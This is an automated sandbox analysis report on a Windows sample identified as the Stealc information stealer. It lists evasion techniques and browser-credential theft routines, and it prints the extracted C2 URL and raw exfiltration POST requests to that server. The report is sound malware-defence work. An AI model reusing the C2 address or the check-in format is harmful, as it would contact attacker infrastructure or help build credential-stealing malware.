Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561592
MD5:925d775a24989da8e83cabcd00fde1d3
SHA1:73373f88fa6798ac4a4bc1566b62814deeb362de
SHA256:362ede5e1060f28217d49706ced46a1bea1e175bf91c4a1457f921904b9bb32a
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 925D775A24989DA8E83CABCD00FDE1D3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1425810310.0000000000FAC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1375500190.0000000004C00000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7644JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7644JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-23T21:08:10.385909+010020442431Malware Command and Control Activity Detected192.168.2.949717185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206/c4becf79229cb002.php7SAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpbZAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpJZAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/~Avira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.7644.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00344C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00344C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003640B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_003640B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003460D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_003460D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00356960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00356960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0034EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00349B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00349B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00356B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00356B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00349B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00349B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00347750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00347750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003518A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003518A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00353910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00353910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0035E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00351269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00351269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00351250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00351250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00354B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00354B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00354B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00354B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003523A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003523A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00352390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00352390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0034DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0034DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0034DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0035CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0035DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0035D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0035D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003416B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003416B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003416A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003416A0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.9:49717 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 32 45 42 30 34 39 39 38 44 32 33 31 30 39 39 37 33 34 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 2d 2d 0d 0a Data Ascii: ------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="hwid"C32EB04998D23109973498------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="build"mars------JEHDHIEGIIIDHIDHDHJJ--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00344C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00344C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 32 45 42 30 34 39 39 38 44 32 33 31 30 39 39 37 33 34 39 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 4a 2d 2d 0d 0a Data Ascii: ------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="hwid"C32EB04998D23109973498------JEHDHIEGIIIDHIDHDHJJContent-Disposition: form-data; name="build"mars------JEHDHIEGIIIDHIDHDHJJ--
              Source: file.exe, 00000000.00000002.1425810310.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/9
              Source: file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/J
              Source: file.exe, 00000000.00000002.1425810310.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1425810310.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.1425810310.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php%
              Source: file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php7S
              Source: file.exe, 00000000.00000002.1425810310.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpJZ
              Source: file.exe, 00000000.00000002.1425810310.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpbZ
              Source: file.exe, 00000000.00000002.1425810310.0000000000FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/~
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00349770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_00349770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070000E0_2_0070000E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003648B00_2_003648B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070515D0_2_0070515D
